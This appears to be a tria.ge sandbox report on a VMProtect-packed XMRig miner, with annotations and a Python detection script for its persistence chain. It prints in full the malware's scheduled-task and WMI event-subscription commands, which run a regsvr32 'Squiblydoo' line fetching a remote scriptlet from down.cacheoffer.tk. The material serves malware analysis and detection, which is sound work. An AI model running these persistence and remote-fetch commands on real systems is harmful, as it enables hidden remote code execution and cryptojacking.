Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 148s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 26/05/2024, 11:11
Behavioral task
- behavioral1
- Sample: 75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
- Resource: win7-20231129-en
General
- Target: 75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
- Size: 348KB
- MD5: 75497caaa52797d58a70cdbe1cb1252c
- SHA1: a3ee3f7b8940dfadfc728b7467679879640f9578
- SHA256: cccdcd65247b27e1d3587cc6d365a5dd703954ec578f288ccf2c97b85837b069
- SHA512: f3f9ab4f058af45f4b148433f565fa1d602339b52cca84ea8dd1dc1ef59c1c7050cf04421a77dd557e81ddf316a5177ff89bfafb50de5f26d7ca85289b50d2d6
- SSDEEP: 6144:FbF9t7qqDX+ZUMPyc0vcDDleaLDnKVaG1S/YNe7Y:5D4qr+SMPGv2DleaLDnKkG1fl
Malware Config
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro. In this run the parent is WmiPrvSE.exe, the WMI provider host, and the child is the exact regsvr32.exe command line registered as the CommandLineEventConsumer H999 (see Processes): the spawn is the WMI permanent event subscription firing, not an exploit of WmiPrvSE.
- description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | pid: 1912 | pid_target: 2580 | Process: regsvr32.exe | procid_target: 33
XMRig Miner payload 3 IoCs
- resource: behavioral1/memory/1632-0-0x000000013FA50000-0x000000013FB0C000-memory.dmp | yara_rule: xmrig
- resource: behavioral1/memory/1632-1-0x000000013FA50000-0x000000013FB0C000-memory.dmp | yara_rule: xmrig
- resource: behavioral1/memory/1632-4-0x000000013FA50000-0x000000013FB0C000-memory.dmp | yara_rule: xmrig
YARA rule vmprotect 3 IoCs
- resource: behavioral1/memory/1632-0-0x000000013FA50000-0x000000013FB0C000-memory.dmp | yara_rule: vmprotect
- resource: behavioral1/memory/1632-1-0x000000013FA50000-0x000000013FB0C000-memory.dmp | yara_rule: vmprotect
- resource: behavioral1/memory/1632-4-0x000000013FA50000-0x000000013FB0C000-memory.dmp | yara_rule: vmprotect
All six matches are on the same 0x13FA50000-0x13FB0C000 image region of PID 1632, which is the submitted executable itself, dumped at three points during the run. Both the xmrig and the vmprotect rule hit the memory dumps rather than the file on disk, which is what a VMProtect-wrapped XMRig build looks like once unpacked in memory; a static scan of the 348KB sample would be expected to see only the packer.
Drops file in System32 directory 17 IoCs
- File created C:\Windows\system32\perfc011.dat (WmiApSrv.exe)
- File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h (WmiApSrv.exe)
- File created C:\Windows\system32\perfh00A.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfh00C.dat (WmiApSrv.exe)
- File created C:\Windows\system32\PerfStringBackup.TMP (WmiApSrv.exe)
- File created C:\Windows\system32\perfh007.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfh009.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfc009.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfc00A.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfc00C.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfc010.dat (WmiApSrv.exe)
- File created C:\Windows\system32\perfh011.dat (WmiApSrv.exe)
- File opened for modification C:\Windows\system32\PerfStringBackup.INI (WmiApSrv.exe)
- File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini (WmiApSrv.exe)
- File created C:\Windows\system32\perfc007.dat (WmiApSrv.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat (regsvr32.exe)
- File created C:\Windows\system32\perfh010.dat (WmiApSrv.exe)
The 16 WmiApSrv.exe entries are the WMI Performance Adapter rewriting its performance-counter name and help-string files (perfc*.dat, perfh*.dat, PerfStringBackup.*); the adapter is started on demand once the performance classes are queried, which the __EventFilter against Win32_PerfFormattedData_PerfOS_System does. They are a side effect of the WMI subscription, not a dropped payload. The single regsvr32.exe entry, counters.dat under config\systemprofile, is WinINet cache bookkeeping from the HTTP fetch of the scriptlet, written to the SYSTEM profile because the consumer runs as LocalSystem.
Drops file in Windows directory 3 IoCs
- File created C:\Windows\inf\WmiApRpl\WmiApRpl.h (WmiApSrv.exe)
- File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h (WmiApSrv.exe)
- File created C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini (WmiApSrv.exe)
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. Here the task is named WindowsUpdateInternel (a misspelled Windows Update look-alike) and created with /SC MINUTE /MO 5 /F, so every five minutes it re-runs the same regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll one-liner that the WMI consumer executes; the full command line is under Processes.
- pid: 3056 | Process: SchTasks.exe
Modifies data under HKEY_USERS 24 IoCs
All 24 writes are made by regsvr32.exe under \REGISTRY\USER\.DEFAULT, the hive LocalSystem uses, and are WinINet bookkeeping: WPAD proxy auto-detect decisions, ZoneMap flags, cache prefixes and connection settings. They are consistent with regsvr32 fetching http://down.cacheoffer.tk/d2/reg9.sct while running as SYSTEM out of the WMI consumer; none of them is a persistence location (no Run key, service or shell extension is written).
- Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionTime = 30c2f59c5dafda01 (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecision = "0" (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionReason = "1" (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977} (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadDecisionReason = "1" (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadDecision = "0" (regsvr32.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadNetworkName = "Network 3" (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\ee-11-a7-3b-9b-9c (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" (regsvr32.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" (regsvr32.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings (regsvr32.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (regsvr32.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (regsvr32.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad (regsvr32.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadDecisionTime = 30c2f59c5dafda01 (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (regsvr32.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (regsvr32.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (regsvr32.exe)
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c (regsvr32.exe)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Listed in the order the report shows them; the list is capped at 64 entries.
- wmic.exe (PID 2520), 20 tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- wmic.exe (PID 3004), the same 20 tokens
- 75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe (PID 1632), 1 token: SeLockMemoryPrivilege
- wmic.exe (PID 2852), the same 20 tokens
- wmic.exe (PID 2520), 3 further tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege
The 63 wmic.exe entries are that utility's normal start-up behaviour (it enables every privilege available to its token) and say nothing about the sample beyond the fact that it launched wmic. The one entry that belongs to the sample is SeLockMemoryPrivilege in PID 1632: XMRig requests it to back its hashing scratchpad with large pages, and it is a useful tell for miners running under an elevated token.
Suspicious use of WriteProcessMemory 12 IoCs
- PID 1632 (75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe) wrote to memory of 3056 (SchTasks.exe, procid_target 29): 3 writes
- PID 1632 wrote to memory of 2520 (wmic.exe, procid_target 30): 3 writes
- PID 1632 wrote to memory of 2852 (wmic.exe, procid_target 31): 3 writes
- PID 1632 wrote to memory of 3004 (wmic.exe, procid_target 32): 3 writes
Each target is a child the sample had just created, and three writes per child is the pattern of a parent handing a new process its startup data through CreateProcess; there is no write into a process the sample did not start, so this is not injection.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe (PID 1632)
  "C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\SchTasks.exe (PID 3056, child of 1632)
    SchTasks.exe /Create /SC MINUTE /TN WindowsUpdateInternel /TR "regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll" /MO 5 /F
    - Creates scheduled task(s)
  - C:\Windows\System32\Wbem\wmic.exe (PID 2520, child of 1632)
    wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="H888", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 2852, child of 1632)
    wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="H999", CommandLineTemplate="regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll"
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 3004, child of 1632)
    wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"H888\"", Consumer="CommandLineEventConsumer.Name=\"H999\""
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\WmiApSrv.exe (PID 2600)
  C:\Windows\system32\wbem\WmiApSrv.exe
  - Drops file in System32 directory
  - Drops file in Windows directory
- C:\Windows\system32\regsvr32.exe (PID 1912, spawned by wmiprvse.exe)
  regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll
  - Process spawned unexpected child process
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
The tree reads as one persistence chain with two triggers for the same payload. The sample (a VMProtect-packed XMRig build, per the memory YARA hits) first registers a scheduled task that runs every five minutes, then uses three wmic calls to build a permanent WMI event subscription: filter H888 polls Win32_PerfFormattedData_PerfOS_System every 60 seconds and matches while SystemUpTime is between 200 and 320 seconds, i.e. a few minutes after every boot; consumer H999 holds the command to run; the binding ties them together. Both triggers execute the same "Squiblydoo" one-liner, regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll, which makes the signed regsvr32 binary fetch a remote .sct scriptlet over HTTP and execute it through scrobj.dll without touching DllRegisterServer (/n) and silently (/s). In the sandbox the WMI side fired: WmiPrvSE.exe hosts the consumer, which is why regsvr32 (PID 1912) appears with WmiPrvSE as its unexpected parent and runs as SYSTEM, writing under the .DEFAULT hive and the config\systemprofile cache. In ATT&CK terms that is T1546.003 (WMI Event Subscription), T1053.005 (Scheduled Task), T1218.010 (Regsvr32) and T1496 (Resource Hijacking). Cleanup has to remove the task, all three subscription objects in root\subscription, and whatever reg9.sct installed; the sandbox did not capture the scriptlet's contents.
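The two persistence triggers above (scheduled task plus WMI filter/consumer/binding, both carrying the regsvr32 scriptlet command) turned into detection logic, as an added example that is not part of the tria.ge report and not tria.ge code. The events are transcribed from the Processes section; the pid/image/parent_image/cmdline field names are an assumed minimal event shape, not a tria.ge export format, and the PID 4100 event (a hypothetical msiexec-launched regsvr32 registering a local DLL) is a constructed benign control. The poll-count arithmetic assumes the subscription already exists at boot and that the WQL WITHIN polling runs at a fixed period with unknown phase.

```python
# Added example (not tria.ge code): detection logic over the persistence chain in this report.
# EVENTS is transcribed from the Processes section; the PID 4100 entry is a constructed benign control.
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid image parent_image cmdline")  # assumed event shape

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe"
SCRIPTLET = "regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll"
WMIC_NS = r'wmic /NAMESPACE:"\\\root\subscription" PATH '
EVENTS = [
    ProcEvent(3056, r"C:\Windows\system32\SchTasks.exe", SAMPLE,
              f'SchTasks.exe /Create /SC MINUTE /TN WindowsUpdateInternel /TR "{SCRIPTLET}" /MO 5 /F'),
    ProcEvent(2520, r"C:\Windows\System32\Wbem\wmic.exe", SAMPLE, WMIC_NS + r'__EventFilter CREATE Name="H888", '
              r'EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent '
              r'WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" '
              r'AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"'),
    ProcEvent(2852, r"C:\Windows\System32\Wbem\wmic.exe", SAMPLE, WMIC_NS + 'CommandLineEventConsumer CREATE '
              f'Name="H999", CommandLineTemplate="{SCRIPTLET}"'),
    ProcEvent(3004, r"C:\Windows\System32\Wbem\wmic.exe", SAMPLE, WMIC_NS + r'__FilterToConsumerBinding CREATE '
              r'Filter="__EventFilter.Name=\"H888\"", Consumer="CommandLineEventConsumer.Name=\"H999\""'),
    ProcEvent(1912, r"C:\Windows\system32\regsvr32.exe", r"C:\Windows\system32\wbem\wmiprvse.exe", SCRIPTLET),
    ProcEvent(4100, r"C:\Windows\system32\regsvr32.exe", r"C:\Windows\system32\msiexec.exe",  # hypothetical
              r'regsvr32 /s "C:\Program Files\Example\example.dll"'),
]

# regsvr32 loading scrobj.dll with a remote /i: scriptlet ("Squiblydoo"), wherever it sits in a command line
SCROBJ_RE = re.compile(r'regsvr32(?:\.exe)?\b.*?/i:(?P<url>https?://[^\s"]+).*?scrobj\.dll', re.I)
WMI_NS_RE = re.compile(r"\\root\\subscription", re.I)
WMI_CLASS_RE = re.compile(r"\bPATH\s+(__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding)\b")
NAME_RE = re.compile(r'\bName="([^"]+)"')          # Name="H888" on the CREATE lines
BIND_RE = re.compile(r'\.Name=\\"([^"\\]+)\\"')   # __EventFilter.Name=\"H888\" on the binding line
UPTIME_RE = re.compile(r"SystemUpTime\s*>=\s*(\d+).*?SystemUpTime\s*<\s*(\d+)")
WITHIN_RE = re.compile(r"\bWITHIN\s+(\d+)", re.I)
TASK_RE = re.compile(r"/TN\s+(\S+)", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Per-event rules; returns the labels that fire (empty list for the benign control)."""
    hits, image, parent = [], basename(ev.image), basename(ev.parent_image)
    if m := SCROBJ_RE.search(ev.cmdline):
        hits.append(f"regsvr32_remote_scriptlet:{m.group('url')}")
    if image == "regsvr32.exe" and parent == "wmiprvse.exe":  # the parent/child anomaly the sandbox flagged
        hits.append("wmiprvse_spawned_regsvr32")
    if image == "schtasks.exe" and "/create" in ev.cmdline.lower() and (m := TASK_RE.search(ev.cmdline)):
        hits.append(f"schtasks_create:{m.group(1)}")
    if image == "wmic.exe" and WMI_NS_RE.search(ev.cmdline):
        cls = WMI_CLASS_RE.search(ev.cmdline)
        hits.append(f"wmi_subscription:{cls.group(1) if cls else 'unknown'}")
        if u := UPTIME_RE.search(ev.cmdline):
            hits.append(f"boot_window:{u.group(1)}-{u.group(2)}s")
    return hits

def reconstruct_chain(events):
    """Join the wmic calls back into filter -> binding -> consumer; also keep tasks and scriptlet URLs."""
    chain = {"filters": {}, "consumers": {}, "bindings": [], "tasks": {}, "urls": set()}
    for ev in events:
        cmd, image = ev.cmdline, basename(ev.image)
        if m := SCROBJ_RE.search(cmd):
            chain["urls"].add(m.group("url"))
        if image == "schtasks.exe" and (m := TASK_RE.search(cmd)):
            chain["tasks"][m.group(1)] = cmd
        if image != "wmic.exe" or not WMI_NS_RE.search(cmd):
            continue
        cls, name = WMI_CLASS_RE.search(cmd), NAME_RE.search(cmd)
        kind = cls.group(1) if cls else ""
        if kind == "__EventFilter" and name:
            win, within = UPTIME_RE.search(cmd), WITHIN_RE.search(cmd)
            # (uptime_lo, uptime_hi, poll_seconds), or None when the query is not the uptime pattern
            chain["filters"][name.group(1)] = (*map(int, win.groups()), int(within.group(1))) if win and within else None
        elif kind == "CommandLineEventConsumer" and name:
            chain["consumers"][name.group(1)] = cmd
        elif kind == "__FilterToConsumerBinding":
            chain["bindings"].append(tuple(BIND_RE.findall(cmd)))
    return chain

def polls_in_window(within, lo, hi):
    """(min, max) number of WITHIN-second polls that fall in uptime [lo, hi), whatever the poll phase."""
    width = hi - lo
    return width // within, -(-width // within)

def verdict(chain):
    """Findings that need a complete filter->consumer binding, or a task, running a remote scriptlet."""
    findings = []
    for flt, con in chain["bindings"]:
        f, c = chain["filters"].get(flt), chain["consumers"].get(con)
        if f and c and SCROBJ_RE.search(c):
            lo, hi, within = f
            n_min, n_max = polls_in_window(within, lo, hi)
            times = str(n_min) if n_min == n_max else f"{n_min}-{n_max}"
            findings.append(f"WMI persistence {flt}->{con}: {times} poll(s) per boot land in uptime "
                            f"{lo}-{hi}s, each running a remote scriptlet")
    for task, cmd in chain["tasks"].items():
        if SCROBJ_RE.search(cmd):
            findings.append(f"Scheduled task {task} re-runs the remote scriptlet")
    return findings
```

classify() is the per-event layer a SIEM rule would run on Sysmon event 1 or 4688 data; reconstruct_chain() and verdict() are the correlation layer, which only reports WMI persistence once a filter, a consumer carrying the scriptlet command and a binding between the two have all been seen, so a lone wmic call (or an administrator's legitimate subscription) does not produce the high-severity finding. polls_in_window() makes the trigger concrete: a 120-second uptime window polled every 60 seconds is hit exactly twice per boot, so the scriptlet is fetched twice a few minutes after start-up in addition to the task's five-minute schedule.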
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 141KB
  MD5: cea1b98ec0c3919cc62c836e00c68863
  SHA1: e02600d4cb930ce357e0df3a1acf3a33ad238fa3
  SHA256: 8f44cd24382a3719b6fe3b0866286f4543257629b087fba76bc43158c22faed6
  SHA512: af44659dfa613c9a30761b996453e5ff6b5d7ed1e5e5b1003b2f2d6348507bbc4ccd54ced36981fb50706ce880cea69994cfbafccfeb1e19f23c05623c198644
- Filesize: 150KB
  MD5: 5fe26038676903a26f9b5c18cb89a3af
  SHA1: 7733ca2859fd63d4031cae579ef969b3c1c40697
  SHA256: c93baa487d4cc947ade03b8198e8031a2e85285e3a8681d8b42b35bdfc2bba6f
  SHA512: 2e3ed43d68df58b6fa15bd13587ddcccf6396d688a27f7122f89f56373af2f46356f7279fd08a41d673903e82af159d383b245f73bfc69de370e5bb699b03c4a
- Filesize: 141KB
  MD5: 822e634903f0f097472909713272812c
  SHA1: 00014d6d5586deea745580e8555df39115f3e0aa
  SHA256: 6dd5e379751f7294a604c8235162e782d10a2f426239e2c0ea479b732da4f693
  SHA512: 2e0feb10dcdcbce6609d3ea07e20ac2050429081baaa30704a13848c839670b68fa75696d8741cc7473b7ee993843a086e80a6c433f93ab8d22ecd07d72855c4
- Filesize: 142KB
  MD5: 71b854c727e136df2704232789a09457
  SHA1: 015010461e0c9f499047591ae850c9d013a04f33
  SHA256: aa180f83eff8188abc3594032c36a545bb81d9fa01973aa74cf3977f2eeb2459
  SHA512: 17e31ecf14815d4387acc86f34591ce16ccc099557bc2265135be62314d4c6f0946d9472690de8c43313d1839112556ffeee91322dcd656830be234511b1a9f0
- Filesize: 114KB
  MD5: bee5d91b496fb80f633b314b1dbb55eb
  SHA1: 25c99dd2d14166bdb16a3b0238204fa8c0094780
  SHA256: 60f1cd5bc3deb6245e628c6be28bb5425e9c9c24437832929f4d55265ce51334
  SHA512: 468c5745197bf8a044236dcb86ee398d269e35ef1c93bceb171c9e99bd2bcb39240cbe8280daa8f3d0af4f93b616a47d5d73188c3d2fce244f9ad2e089e2f460
- Filesize: 668KB
  MD5: 5bf32d9691933ae11b5eada31f1a2377
  SHA1: 1124bab5271e006d69968eb2bb365e26fb02e3dd
  SHA256: 26e51dd53f5835053443c5b07158243e71e7baf840af6553a144adade35cad98
  SHA512: 633aaca0a283891d7ff034c2ce22e98b804ecf2f617ce131e5680f43f52d011c10fb7267987c09fa9b803c93ccedbb9f40325f3229a9228ed1c1d236ce55e8f1
- Filesize: 634KB
  MD5: 2607d7f6cb436cfc13dcb11cd9d00b66
  SHA1: 3e6fec2467a5df541d074fe0e0022eba8232770f
  SHA256: d9853dc6c034b3a304321c8d26274cb1579a4d20499b68b76fb3b947fb30b975
  SHA512: b53817c724409e5794a4d767bbb0fc16badc7a5088165401728885daecd0a6d986bc42f80c70cbd98d8602b6ffe742d7ac6c71dfc05a95e4210b4c2185d3a5ee
- Filesize: 715KB
  MD5: d18094b6e68efa9614d1e416fb102f4d
  SHA1: 131620905e016bc2e5af2fb460aade913b66d48d
  SHA256: 1523ee3af7aa4808b9b7b653ef832a42eae718f73f9928ca78c0e2073e1102dc
  SHA512: 0257a3be68815d4a6c62f15070c9f56494181dec7eca30ff0ce2b6fc38c1c41a762906e6574b8052b1c9b066f75cadf654827abcb42a8894f55df8a360902e21
- Filesize: 715KB
  MD5: 83b8ddadf5ee6b232ddc0b838513fc4d
  SHA1: 3190361e0dbba650db72dc694c8ae1468c54faf7
  SHA256: f71fa81e3e44ed984753867048874e68820b29eaa719607d8cd9019b5c70dac7
  SHA512: 4a5c75769fce64b6f73b9163827d073f28652bd32d7d3bcf58bceb00baae222a6e588eb4d19fc9727940408da09131feb03c43f1a345bf3027c07a0248f8316b
- Filesize: 722KB
  MD5: 37997b4a765e0df0944deb7b3c68fc9f
  SHA1: 7f70b0f88f8353e6e382f80b38d47736e2de81ca
  SHA256: f82abb5bf658ddc5bbf83b786d83636f830494a3c259140cab60e52582c87ac6
  SHA512: e28605ce84f795aa8b100c8da3129a8ed370861bd229265f0a1093fbb0ec5ed13e78657f30f266a707848e1f651543b4dc5fdf5ad61ed5e61b1e68ff03dcb25c
- Filesize: 406KB
  MD5: 0e026eb49e299091e1b0052091c3054d
  SHA1: bc2ba534a80f8eb70513fc3a21b8189bcb66e7a3
  SHA256: 7c61b56375d8dea0a9e1992763fd118b717898fe3a58270288026caad3c29e44
  SHA512: b4eff969eb5ae37219fa865b9b3649a64aa4f022cc4d1bacb44af06bdaf0bb6d8ff764cc0f2d0d5596895a24a8e30ffdbff28065ed84e3fcfdfe1087c417b2a8
- Filesize: 3KB
  MD5: b133a676d139032a27de3d9619e70091
  SHA1: 1248aa89938a13640252a79113930ede2f26f1fa
  SHA256: ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15
  SHA512: c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5
- Filesize: 27KB
  MD5: 46d08e3a55f007c523ac64dce6dcf478
  SHA1: 62edf88697e98d43f32090a2197bead7e7244245
  SHA256: 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614
  SHA512: b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42